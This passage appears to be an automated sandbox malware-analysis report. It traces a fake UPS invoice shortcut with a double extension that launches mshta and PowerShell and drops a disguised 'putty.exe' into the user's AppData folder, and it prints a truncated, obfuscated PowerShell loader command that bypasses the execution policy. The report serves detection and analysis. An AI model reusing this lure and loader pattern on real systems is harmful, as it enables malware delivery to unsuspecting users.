Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: imgutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\putty.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: Invoice-UPS-218931.pdf.lnk.mal.lnk | LNK file: ..\..\..\..\..\Windows\System32\forfiles.exe
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\putty.exe | Window detected: Number of UI elements: 20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: BthUdTask.pdbGCTL source: mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1788162718.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793723399.0000023F9E010000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790513355.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781797733.0000023F9A12F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780196042.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780501830.0000023F9E075000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793583362.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780052517.0000023F9E0D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1782232696.00000237975FD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790461409.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793809350.0000023F9E076000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793264894.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780480215.0000023F9A1E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793828055.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, invoiceupsstage[1].4.dr
Source: Binary string: .pdbGCTL source: mshta.exe, 00000004.00000003.1780875436.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780196042.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793828055.0000023F9E0BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: BthUdTask.pdb source: mshta.exe, 00000004.00000003.1788162718.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793723399.0000023F9E010000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1780951650.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790513355.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1781797733.0000023F9A12F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793583362.0000023F9A1BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1790461409.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1793264894.0000023F9A130000.00000004.00000020.00020000.00000000.sdmp, invoiceupsstage[1].4.dr

Data Obfuscation

Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FwbFg($aDSKbaK){return -split ($aDSKbaK -replace '..', '0x$& ')};$JMNVEMgx = FwbFg[...]fcuYB
Source: invoiceupsstage[1].4.dr | Static PE information: real checksum: 0x9660 should be: 0x361dc
Source: invoiceupsstage[1].4.dr | Static PE information: section name: .didat
Source: putty.exe.7.dr | Static PE information: section name: .00cfg
Source: putty.exe.7.dr | Static PE information: section name: .gxfg
Source: putty.exe.7.dr | Static PE information: section name: _RDATA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_00007FFB49B2919D push E85B7B00h; ret 7_2_00007FFB49B291F9

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\mshta.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\invoiceupsstage[1]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\putty.exe

Hooking and other Techniques for Hiding and Protection

Source: Possible double extension: pdf.lnk | Static PE information: Invoice-UPS-218931.pdf.lnk.mal.lnk
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D9610 IsIconic,SetWindowTextW,SetWindowTextA, 12_2_00007FF6785D9610
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D96E0 IsIconic,SetWindowTextW,SetWindowTextA, 12_2_00007FF6785D96E0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D97B0 IsIconic,ShowWindow, 12_2_00007FF6785D97B0
Source: C:\Users\user\AppData\Roaming\putty.exe | Code function: 12_2_00007FF6785D51DF RegisterClipboardFormatA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CoInitialize,MessageBoxA, 12_2_00007FF6785D51DF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
